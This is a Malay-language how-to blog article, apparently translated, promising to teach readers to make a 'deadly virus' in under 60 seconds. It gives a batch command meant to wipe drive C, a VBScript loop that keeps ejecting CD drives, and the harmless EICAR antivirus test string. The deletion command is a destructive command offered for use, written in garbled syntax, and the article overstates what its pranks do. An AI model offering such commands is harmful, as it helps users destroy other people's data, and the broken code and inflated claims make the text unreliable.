Cara Membuat Virus Maut dalam Masa Kurang 60 Saat, 100% Berfungsi!

Apa maksud anda dengan membuat virus? Ya, anda mencipta virus anda sendiri. Nah, melalui artikel ini Jaka akan memberikan cara untuk membuat virus yang mematikan dengan cepat

Dalam penggunaan komputer, tentu kita mesti takut ketika mendengar perkataan VIRUS . Kerana, yang satu ini dapat menyerang komputer kita dan merosakkan sistem dan bahkan dapat mencuri data kita. Oleh itu, kita lebih tahu bagaimana membuat virus.

Apa maksud anda dengan membuat virus? Ya, anda mencipta virus anda sendiri. Nah, melalui artikel ini Jaka akan memberikan cara untuk membuat virus mematikan dengan sangat cepat, walaupun dalam masa kurang dari 60 saat anda berjaya membuatnya. Jangan percaya?

BACA JUGA
  • Cara Membuat Virus Komputer Mudah Mengikut Penyelesaiannya (Bahagian 1)
  • Cara Membuat Virus Komputer Mudah Mengikut Penyelesaiannya (Bahagian 2)
  • Cara Membuat Virus Komputer Mudah Mengikut Penyelesaiannya (Bahagian 3)

Cara Membuat Virus Maut dalam Masa Kurang 60 Saat!

1. Cara membuat virus berbahaya

Untuk membuat virus berbahaya yang cukup mematikan, anda hanya perlu mengambil beberapa langkah . Tahap berikut:

  • Buka Notepad dan copy-paste kod di bawah.

@Echo off Del C: *.* |y

  • Simpan dengan sebarang nama, selagi anda menyukainya . BAT . Contohnya, Virus.bat. Selesai.

Dengan cara ini, pemacu C anda yang biasanya anda gunakan untuk sistem akan dipadamkan sepenuhnya. Malah, sistem operasi komputer juga akan rosak. Jangan mencubanya di komputer anda sendiri.

LIHAT ARTIKEL

2. Cara membuat virus CD-ROM

Langkah ini mudah. Anda hanya perlu membuka Notepad , dan copy-paste kod di bawah sekali lagi, dan simpan dengan nama CD-ROM.vbs . Sekarang, apabila anda mengklik dua kali fail, pemacu CD / DVD akan terus disuntik. Untuk menghentikannya, buka Pengurus Tugas dan matikan wscipt.exe .

Set oWMP = CreateObject( WMPlayer.OCX.7 ) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop

3. Cara Membuat Virus untuk Antivirus

Cukup buka Notepad dan copy-paste kod di bawah. Kemudian, jika antivirus anda betul-betul berfungsi, fail ini akan segera dihapus oleh antivirus anda. Jangan lupa menamakan fail EICAR.COM .

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Itulah 3 cara untuk membuat virus mematikan yang memakan masa kurang dari 60 saat. Anda boleh mencari artikel mengenai virus lain atau membaca artikel lain yang dibuat oleh Jofinno Herian.

Artikel Berkaitan